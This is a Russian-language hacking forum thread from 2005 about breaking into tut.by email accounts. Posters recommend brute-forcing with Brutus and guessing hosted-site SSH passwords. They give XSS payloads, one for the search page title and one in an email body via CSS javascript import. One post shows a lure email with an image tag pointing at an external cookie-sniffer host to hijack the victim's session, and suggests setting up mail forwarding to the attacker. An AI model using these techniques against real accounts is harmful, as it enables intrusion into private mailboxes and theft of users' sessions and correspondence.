tut.by

Discussion in 'Уязвимости Mail-сервисов' started by Tommi, 12 Oct 2005.

  1. Tommi

    Tommi New Member

    Joined:
    10 Oct 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Народ кто-нибудь знает как ломать ящики на tut.by?
     
  2. Nexwill

    Nexwill Elder - Старейшина

    Joined:
    2 Aug 2005
    Messages:
    132
    Likes Received:
    45
    Reputations:
    22
    Brutus в руки и погнал......
     
  3. Tommi

    Tommi New Member

    Joined:
    10 Oct 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Брутус - это и ёжику понятно. А как-нить поумнее можно? :rolleyes:
     
  4. ais+

    ais+ New Member

    Joined:
    17 Aug 2005
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Все сайты, которые они хостят, лежат вмесе с их мыльницей на одном серве.
    ЗЫ для каждого хостящегося есть ssh. Пассы на ssh обычно:
    логин - низвание сайта без домена, а пароль комбинация 9 чисел и букв.
    Там дохрена сайтов с ipb и phpbb помойму до сих пор валяется.
     
  5. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Хм..

    Умнее... Ищи xss. Есть пасивная в поле поискового запроса, прямо на главной, там в теге title ничего не фильтруется. xss выглядит так:
    Code:
    </title><script>alert('Antichat (c)!')</script>
    Может пригодиться..
     
    #5 Dronga, 16 Oct 2005
    Last edited: 16 Oct 2005
  6. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Взлом tut.by

    Ну чтож.. На редкость дырявый портал. За 20 минут было обнаружено несколько активных xss в теле письма. Вот пример:

    Code:
    <style type="text/css">@import url(javascript:alert('Antichat have it!'));</style>
    Работает в IE. Поскольку для аутентификации куки не используются, то взлом упрощается до нельзя. Всего навсего требуется сессия. Отправляешь жертве такую тему:


    Code:
    Привет, как дела?
    <img src="http://antichat.ru/cgi-bin/s.jpg">
    и подписываешься на снифер. ВСЁ! Ящик твой.

    Палева - 0, эффективность - 100%, жаль пароля не будет) Очень рекомендую использовать при этом программу XSS Tester от LittleLamer. Можно скачать с этой странички.

    Если прибавишь мне репутацию, то я не обижусь.
     
    #6 Dronga, 16 Oct 2005
    Last edited: 16 Oct 2005
  7. limbonic

    limbonic New Member

    Joined:
    5 Dec 2003
    Messages:
    52
    Likes Received:
    0
    Reputations:
    0
    Мда ....осталось только чтобы жертва почту првоеряла через инет =))
     
  8. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Только осталось... Так говоришь, как будто это делают единицы) По мне так, пускай лучше меня взламает неизвестный мне тип, чем сосед по локалке, который отснифал пасс по POP3... Портал вообще безбашенный в плане безопасности.. Куда смотрят...
     
    #8 Dronga, 18 Oct 2005
    Last edited: 18 Oct 2005
  9. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    А если отснифовать куки с почтовика-то нельзя будет полностью забрать этот ящик себе? Т.е. сменить пароль?
     
  10. Meister

    Meister Elder - Старейшина

    Joined:
    13 Oct 2005
    Messages:
    185
    Likes Received:
    7
    Reputations:
    0
    А я присылаю себе картинку от снифера, но не вижу себя в логах. Уже на нескольких почтах делал. Что-то изменили?
     
  11. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Нет, полностью забрать его себе не удастся, только полный доступ к ящику на время сессии. Если ты что-либо хочешь сотворить с ящиком, в т.ч. сменить пароль, но у тебя запрашивают старый пароль, то ничего тебе не светит... Пароль никаким печеньем не заменишь. В подобных случаях советую пользоваться альтернативными методами, как то настройка пересылки с ящика жертвы на ваш... ну и подобные трюки.
    Всё что описано выше актуально исключительно для tut.by на момент написания, я проверял лично. Сейчас не знаю.
     
  12. =Koba=

    =Koba= New Member

    Joined:
    27 Jan 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Ну и на чем остановились? Сменить пароль на туте реально?
     
  13. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Какие люди ленивые пошли... Зайди на аккаунт tut.by, потом представь что ты забыл нахер пароль и тебе край нужно его поменять... Найдешь способ сделать это - значит сменить пасс реально. Если нет, то остается только брут/угадывание/чтение мыслей хозяина...